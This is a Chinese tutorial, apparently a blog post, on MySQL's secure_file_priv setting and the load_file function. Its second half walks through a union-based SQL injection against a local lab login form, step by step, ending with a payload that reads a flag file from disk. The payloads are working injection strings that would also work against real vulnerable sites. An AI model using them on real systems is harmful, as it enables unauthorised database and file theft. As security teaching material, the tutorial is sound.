【load_file读文件】

一、文件操作基础

show

先试试 show variables;发现显示了三百多行的系统变量:

这是数据库的目录:

mysql有多种编码方式,有数据库编码、连接时的编码、还有客户端的编码:

这里还有一个日志路径,这个日志是需要手动打开的,但是打开这个日志数据库会大很多:

这个记录的是主机的名字:

mysql端口号默认3306:

版本是5.5.53

这里记录的是机器的型号和操作系统的型号:

我们看到mysql的variables变量非常多,所以我们需要筛选一下,这个时候就可以用通配符like:

cpp 复制代码
show variables like 'sec%';

我们看到第二个选项secure_file_priv它的值是null,它是文件读写相关的选项:


我们用phpstudy快速的打开配置文件:

之间在末尾添加一下,后面没有任何值的,因为不限制导入导出,保存后mysql重启一下就可以生效:

现在可以看到是什么都没有,就表明mysql对导入导出不限制:

load_file


我们本地第一下看看,读完后发现是空值

本地flag的路径也是这个,为什么会是空值呢,事实上是因为我们的反斜杠\,读取目录的时候是不能用反斜杠的,得用普通的斜杠:

这样就成功读取了:

当我们把目录换到了mysql目录,我们再去读就发现读不到了,因为secure_file_priv的目录换到了mysql

目录就只能读mysql目录

我们读一下mysql目录下的文件,成功读取了,www的目录不能读取,因为我们限制了读取目录:

二、Load_file读文件

常规union联合查询注入

cpp 复制代码
测试注入点
username=admin&password=a

闭合
username=admin' and 1=1%23&password=a

测试列数
username=admin' order by 3%23&password=a

测试回显位
username=a' union select 1,2,3%23&password=a

查库名
username=a' union select 1,database(),3%23&password=a

查表名
username=a' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23&password=a

查列名
username=a' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23&password=a

查flag #输出了路径C:/phpstudy_pro/WWW/7/6/flag.txt
username=a' union select 1,flag,3 from flag%23&password=a

读文件
username=a' union select 1,load_file('C:/phpstudy_pro/WWW/7/6/flag.txt'),3 %23&password=a

总结

load_file等读文件的函数受到secure-file-priv 选项的限制,能不能使用load_file进行注入,要看这个选项的配置

文件路径不能使用反斜线\,要使用斜线/

相关推荐
SelectDB16 分钟前
云数仓费钱?用 SelectDB Serverless 三步配出秒级弹性,最高降本 70%
数据库·云原生·数据分析
time展天118 分钟前
Dddify:给 ASP.NET Core 项目一套轻量、清晰、可落地的 DDD 基础设施
数据库·后端·asp.net
杜子不疼.30 分钟前
【Qt初识】工程起步:项目创建、代码解读与对象树
数据库·c++·qt
SelectDB36 分钟前
Agent 场景动态 JSON 性能拆解:Apache Doris 比 ClickHouse 快 7 倍、比 Elasticsearch 快 2 倍
数据库·json·agent
宠友信息42 分钟前
MySQL 租户数据隔离在即时通讯源码后端中的落地方式
java·数据库·spring boot·redis·websocket·mysql
jnrjian2 小时前
PG 切换用户 \c -
数据库·postgresql
Database_Cool_2 小时前
内存数据库持久化方案:阿里云 Tair 持久内存型数据不丢失
数据库·阿里云
treesforest2 小时前
高精度IP定位怎么选?从企业需求出发的选型指南
网络·数据库·tcp/ip·web安全·ip·高精度ip查询
吴声子夜歌2 小时前
Redis 5.x——pub/sub和Stream
数据库·redis·bootstrap
吴声子夜歌2 小时前
Redis 5.x——多种数据类型使用场景
数据库·redis